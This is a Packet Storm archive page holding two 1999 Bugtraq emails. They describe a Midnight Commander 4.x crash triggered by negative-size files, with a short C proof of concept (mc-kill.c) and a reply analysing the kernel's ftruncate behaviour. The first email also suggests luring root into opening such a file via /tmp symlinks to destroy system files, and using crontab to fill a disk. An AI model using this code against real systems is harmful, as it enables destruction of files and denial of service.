exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mc-kill.c

mc-kill.c
Posted Aug 17, 1999

Yet another bug in Midnight Commander 4.xx - this security hole allows local user to potentially gain root privileges due to improper handling of negative file sizes by MC and resulting core dumps.

tags | exploit, local, root
SHA-256 | d9be9334ccae908006a722bfc3d2c16782d3e46589d80e3bcd06ea5519e5cd55

mc-kill.c

Change Mirror Download
Date: Thu, 15 Apr 1999 06:16:08 -0000
From: Maurycy Prodeus <z33d@LIGHTING.ML.ORG>
To: BUGTRAQ@netspace.org
Subject: Large size file and Midnight/bug in crontab with this file

Hello ...
*******************************************************************************
*
* I. -= Midnight small buf =-
*
* II. -= Large size file - you can fill disk too with crontab ( Michal
* Zalewski found this )
*
*******************************************************************************

I.

This time I found another bug in Midnight Commander 4.xx [ i used 4.1.33 ;)] ...
We can make a Segmentation Fault and if root doesn't lock this , it causes
Core Dumping ... ofcourse we just make some file in /tmp (?) and if root
read this file ... his mc creates core... yeesss we can make symlink to
every file in system ... and this file will be total destroy !
Together with "Social Engeering",it is dangerous . [ filename may be example :
hacker.tools or sth. ]
What file we must create ?
With negative size , but really it is a very large size ;-) ( very strange
that even in kernel 2.2.5 it is posible )

Quick test : Run this program and next run mc and try read [ F3 ofcourse
and example PageDown ] file which was created by mc-kill ...

--------- mc-kill.c ------------

#include <sys/file.h>
#include <stdio.h>
#define size -900000

main(int argc,char* argv[]) {
int i;
if (!argv[1]) {
printf("\nUSAGE : %s filename[and patch] \n\n",argv[0]);
exit(0);
}
fchmod(i=open(argv[1],O_RDWR|O_CREAT,0600),0666);
ftruncate(i,size);
fsync(i);
}
------------ end of mc-kill.c ---------------

SOLUTION

You NEVER read strange file in MC ...:-)
hmmm seriously : lcamtuf [ http://dione.ids.pl ] wrote kernel module which
not allow to create symlinks in /tmp ...

II.

If you use above program ( or /dev/zero :-) ) you may fill partition ...
When crontab is reading file , creates temp in /var/spool/cron/ ( non-root
can't even read this - lcamtuf ) But , if it doesn't finish then doesn't
delete
this temp file ... OK. So , we must give crontab file with "infinit" size
.

Example : crontab -file-made-by-mc-kill


SOLUTION

It isn't very dangerous.




*******************************************************************************

z33d email : z33d@lighting.ml.org www : z33d.lighting.ml.org

Jesli nie istnieje racjonalna strategia optymalna , optymalna strategia
jest strategia losowa ...
- unknown -

---------------------------------------------------------------------------------

Date: Thu, 15 Apr 1999 21:06:42 +0200
From: Mixter <mixter@POPMAIL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Large size file and Midnight/bug in crontab with this file

On Thu, 15 Apr 1999, Maurycy Prodeus wrote:

> With negative size , but really it is a very large size ;-) ( very strange
> that even in kernel 2.2.5 it is posible )

That program you wrote is very scary :)
Any user can create files on any kind of partition with a
"negative" size (ie. with wrong file structure information).
IMO, this is a problem of a linux x86 kernel instruction..

ftruncate() :
movl %ebx,%edx
movl 0x8(%esp,1),%ecx
movl 0x4(%esp,1),%ebx
movl $0x5d,%eax
int $0x80
movl %edx,%ebx
cmpl $0xfffff001,%eax
jae 0x804ccf0 <__syscall_error>
ret

This is a sample interrupt which truncates a file belonging to
a file descriptor to any size, including negative, unchecked...
Doing this on a EXT2 fs will get you the error:
EXT2-fs warning (device 03:03): ext2_getblk: block < 0
Any further write access causes the same error... I think
that alot of programs are not prepared for "negative"-size files
and could encounter race conditions, panics, segfaults with this.
The ability of creating such files should be disabled in further
linux kernel releases (anyone tried this on BSD, SunOS etc. yet?).

Mixter

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close